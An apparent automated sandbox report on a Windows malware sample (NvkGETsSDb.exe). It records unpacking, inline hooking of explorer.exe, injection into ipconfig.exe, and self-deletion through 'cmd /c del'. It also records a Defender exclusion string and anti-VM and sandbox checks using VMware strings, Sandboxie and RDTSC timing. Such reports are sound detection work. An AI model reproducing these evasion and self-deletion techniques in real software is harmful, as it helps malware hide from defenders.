          Source: Binary string: ipconfig.pdb source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe, 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NvkGETsSDb.exe, 00000002.00000002.315947777.0000000001470000.00000040.00000001.sdmp, ipconfig.exe

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: NvkGETsSDb.exe, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.NvkGETsSDb.exe.180000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.NvkGETsSDb.exe.180000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.2.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.3.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.7.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.0.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.2.NvkGETsSDb.exe.9e0000.1.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.5.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.NvkGETsSDb.exe.9e0000.9.unpack, Platformer_AI/GameDisplay.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC5155 pushad ; iretd 0_2_04DC515B
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DCCB65 push FFFFFF8Bh; iretd 0_2_04DCCB67
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_00417162 push ebp; ret 2_2_00417163
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041D4B5 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041D56C push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041D502 push eax; ret 2_2_0041D508
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041D50B push eax; ret 2_2_0041D572
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_004165E8 push es; retf 2_2_004165E9
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041CE35 push edi; ret 2_2_0041CE36
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_004176DE push ebp; iretd 2_2_004176A6
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041768B push ebp; iretd 2_2_004176A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BED0D1 push ecx; ret 16_2_02BED0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0015011E push esp; iretd 16_2_00150120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00167162 push ebp; ret 16_2_00167163
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016E3EF push esp; ret 16_2_0016E3F1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016D4B5 push eax; ret 16_2_0016D508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016D502 push eax; ret 16_2_0016D508
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016D50B push eax; ret 16_2_0016D572
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016D56C push eax; ret 16_2_0016D572
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_001665E8 push es; retf 16_2_001665E9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016CE35 push edi; ret 16_2_0016CE36
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016768B push ebp; iretd 16_2_001676A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_001676DE push ebp; iretd 16_2_001676A6

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE7
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'Jump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.NvkGETsSDb.exe.28ed0f8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: NvkGETsSDb.exe PID: 2500, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000159904 second address: 000000000015990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000000159B7E second address: 0000000000159B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe TID: 1400Thread sleep time: -43030s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exe TID: 1140Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6804Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 6452Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeThread delayed: delay time: 43030Jump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000004.00000000.265903999.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.293819740.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.292595814.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.300532803.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000000.294597949.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.300532803.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAAAB0 mov eax, dword ptr fs:[00000030h]16_2_02BAAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAAAB0 mov eax, dword ptr fs:[00000030h]16_2_02BAAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCFAB0 mov eax, dword ptr fs:[00000030h]16_2_02BCFAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B952A5 mov eax, dword ptr fs:[00000030h]16_2_02B952A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B952A5 mov eax, dword ptr fs:[00000030h]16_2_02B952A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B952A5 mov eax, dword ptr fs:[00000030h]16_2_02B952A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B952A5 mov eax, dword ptr fs:[00000030h]16_2_02B952A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B952A5 mov eax, dword ptr fs:[00000030h]16_2_02B952A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCD294 mov eax, dword ptr fs:[00000030h]16_2_02BCD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCD294 mov eax, dword ptr fs:[00000030h]16_2_02BCD294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2AE4 mov eax, dword ptr fs:[00000030h]16_2_02BC2AE4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2ACB mov eax, dword ptr fs:[00000030h]16_2_02BC2ACB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5EA55 mov eax, dword ptr fs:[00000030h]16_2_02C5EA55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD4A2C mov eax, dword ptr fs:[00000030h]16_2_02BD4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD4A2C mov eax, dword ptr fs:[00000030h]16_2_02BD4A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBA229 mov eax, dword ptr fs:[00000030h]16_2_02BBA229
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C24257 mov eax, dword ptr fs:[00000030h]16_2_02C24257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C4B260 mov eax, dword ptr fs:[00000030h]16_2_02C4B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C4B260 mov eax, dword ptr fs:[00000030h]16_2_02C4B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68A62 mov eax, dword ptr fs:[00000030h]16_2_02C68A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB3A1C mov eax, dword ptr fs:[00000030h]16_2_02BB3A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B95210 mov eax, dword ptr fs:[00000030h]16_2_02B95210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B95210 mov ecx, dword ptr fs:[00000030h]16_2_02B95210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B95210 mov eax, dword ptr fs:[00000030h]16_2_02B95210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B95210 mov eax, dword ptr fs:[00000030h]16_2_02B95210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9AA16 mov eax, dword ptr fs:[00000030h]16_2_02B9AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9AA16 mov eax, dword ptr fs:[00000030h]16_2_02B9AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA8A0A mov eax, dword ptr fs:[00000030h]16_2_02BA8A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD927A mov eax, dword ptr fs:[00000030h]16_2_02BD927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5AA16 mov eax, dword ptr fs:[00000030h]16_2_02C5AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5AA16 mov eax, dword ptr fs:[00000030h]16_2_02C5AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99240 mov eax, dword ptr fs:[00000030h]16_2_02B99240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99240 mov eax, dword ptr fs:[00000030h]16_2_02B99240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99240 mov eax, dword ptr fs:[00000030h]16_2_02B99240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99240 mov eax, dword ptr fs:[00000030h]16_2_02B99240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C153CA mov eax, dword ptr fs:[00000030h]16_2_02C153CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C153CA mov eax, dword ptr fs:[00000030h]16_2_02C153CA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4BAD mov eax, dword ptr fs:[00000030h]16_2_02BC4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4BAD mov eax, dword ptr fs:[00000030h]16_2_02BC4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC4BAD mov eax, dword ptr fs:[00000030h]16_2_02BC4BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC2397 mov eax, dword ptr fs:[00000030h]16_2_02BC2397
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCB390 mov eax, dword ptr fs:[00000030h]16_2_02BCB390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA1B8F mov eax, dword ptr fs:[00000030h]16_2_02BA1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA1B8F mov eax, dword ptr fs:[00000030h]16_2_02BA1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C4D380 mov ecx, dword ptr fs:[00000030h]16_2_02C4D380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5138A mov eax, dword ptr fs:[00000030h]16_2_02C5138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBDBE9 mov eax, dword ptr fs:[00000030h]16_2_02BBDBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC03E2 mov eax, dword ptr fs:[00000030h]16_2_02BC03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC03E2 mov eax, dword ptr fs:[00000030h]16_2_02BC03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC03E2 mov eax, dword ptr fs:[00000030h]16_2_02BC03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC03E2 mov eax, dword ptr fs:[00000030h]16_2_02BC03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC03E2 mov eax, dword ptr fs:[00000030h]16_2_02BC03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC03E2 mov eax, dword ptr fs:[00000030h]16_2_02BC03E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C65BA5 mov eax, dword ptr fs:[00000030h]16_2_02C65BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C68B58 mov eax, dword ptr fs:[00000030h]16_2_02C68B58
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC3B7A mov eax, dword ptr fs:[00000030h]16_2_02BC3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC3B7A mov eax, dword ptr fs:[00000030h]16_2_02BC3B7A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9DB60 mov ecx, dword ptr fs:[00000030h]16_2_02B9DB60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5131B mov eax, dword ptr fs:[00000030h]16_2_02C5131B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9F358 mov eax, dword ptr fs:[00000030h]16_2_02B9F358
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9DB40 mov eax, dword ptr fs:[00000030h]16_2_02B9DB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCF0BF mov ecx, dword ptr fs:[00000030h]16_2_02BCF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCF0BF mov eax, dword ptr fs:[00000030h]16_2_02BCF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCF0BF mov eax, dword ptr fs:[00000030h]16_2_02BCF0BF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD90AF mov eax, dword ptr fs:[00000030h]16_2_02BD90AF
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2B8D0 mov eax, dword ptr fs:[00000030h]16_2_02C2B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2B8D0 mov ecx, dword ptr fs:[00000030h]16_2_02C2B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2B8D0 mov eax, dword ptr fs:[00000030h]16_2_02C2B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2B8D0 mov eax, dword ptr fs:[00000030h]16_2_02C2B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2B8D0 mov eax, dword ptr fs:[00000030h]16_2_02C2B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C2B8D0 mov eax, dword ptr fs:[00000030h]16_2_02C2B8D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A0 mov eax, dword ptr fs:[00000030h]16_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A0 mov eax, dword ptr fs:[00000030h]16_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A0 mov eax, dword ptr fs:[00000030h]16_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A0 mov eax, dword ptr fs:[00000030h]16_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A0 mov eax, dword ptr fs:[00000030h]16_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A0 mov eax, dword ptr fs:[00000030h]16_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B99080 mov eax, dword ptr fs:[00000030h]16_2_02B99080
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C13884 mov eax, dword ptr fs:[00000030h]16_2_02C13884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C13884 mov eax, dword ptr fs:[00000030h]16_2_02C13884
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B958EC mov eax, dword ptr fs:[00000030h]16_2_02B958EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B940E1 mov eax, dword ptr fs:[00000030h]16_2_02B940E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B940E1 mov eax, dword ptr fs:[00000030h]16_2_02B940E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B940E1 mov eax, dword ptr fs:[00000030h]16_2_02B940E1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAB02A mov eax, dword ptr fs:[00000030h]16_2_02BAB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAB02A mov eax, dword ptr fs:[00000030h]16_2_02BAB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAB02A mov eax, dword ptr fs:[00000030h]16_2_02BAB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAB02A mov eax, dword ptr fs:[00000030h]16_2_02BAB02A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC002D mov eax, dword ptr fs:[00000030h]16_2_02BC002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC002D mov eax, dword ptr fs:[00000030h]16_2_02BC002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC002D mov eax, dword ptr fs:[00000030h]16_2_02BC002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC002D mov eax, dword ptr fs:[00000030h]16_2_02BC002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC002D mov eax, dword ptr fs:[00000030h]16_2_02BC002D
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C61074 mov eax, dword ptr fs:[00000030h]16_2_02C61074
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C52073 mov eax, dword ptr fs:[00000030h]16_2_02C52073
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C64015 mov eax, dword ptr fs:[00000030h]16_2_02C64015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C64015 mov eax, dword ptr fs:[00000030h]16_2_02C64015
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C17016 mov eax, dword ptr fs:[00000030h]16_2_02C17016
